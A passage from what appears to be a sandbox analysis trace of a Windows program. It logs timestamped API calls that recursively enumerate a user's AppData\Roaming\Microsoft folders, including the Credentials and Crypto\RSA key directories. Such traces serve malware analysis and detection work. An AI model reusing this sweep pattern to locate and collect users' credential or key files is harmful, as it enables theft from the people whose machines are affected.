pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.476] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*" [0083.476] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.476] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.476] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Access" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access" [0083.476] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*" [0083.476] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] PathMatchSpecW (pszFile="AccessCache.accdb", pszSpec="*") returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] PathMatchSpecW (pszFile="AccessCache.laccdb", pszSpec="*") returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] PathMatchSpecW (pszFile="System.mdw", pszSpec="*") returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.476] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.476] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="AddIns" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns" [0083.476] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0083.476] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.476] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.476] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Bibliography" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography" [0083.476] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0083.476] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.476] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="Style" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0083.476] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0083.477] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="CHICAGO.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="GB.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="GostName.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="GostTitle.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="ISO690.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="ISO690Nmerical.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="SIST02.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.477] PathMatchSpecW (pszFile="TURABIAN.XSL", pszSpec="*") returned 1 [0083.477] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.477] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.478] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.478] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials" [0083.478] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0083.478] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.478] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.478] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.478] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto" [0083.478] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0083.478] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.478] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.478] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0083.478] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0083.478] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.478] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.478] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.478] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.478] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.478] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.479] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.479] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.479] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.479] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.479] PathMatchSpecW (pszFile="8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.479] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.479] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.479] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.479] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.479] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.479] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.479] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.479] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Document Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0083.480] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0083.480] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.480] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.480] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0083.480] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0083.480] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.480] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.480] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0083.480] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0083.480] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.480] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.480] PathMatchSpecW (pszFile="Built-In Building Blocks.dotx", pszSpec="*") returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.480] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.480] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.480] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.480] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.480] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Excel" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel" [0083.480] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*" [0083.480] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.481] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="XLSTART" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0083.481] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0083.481] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.481] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.481] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.481] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.481] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IME12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12" [0083.481] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*" [0083.481] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.481] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.481] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12" [0083.481] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*" [0083.481] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.481] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.481] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.481] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP8_1" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1" [0083.481] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*" [0083.481] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.481] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.482] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.482] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP9_0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0" [0083.482] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*" [0083.482] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.482] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.482] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.482] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.482] PathCombineW (in: pszDest=0x18e030, 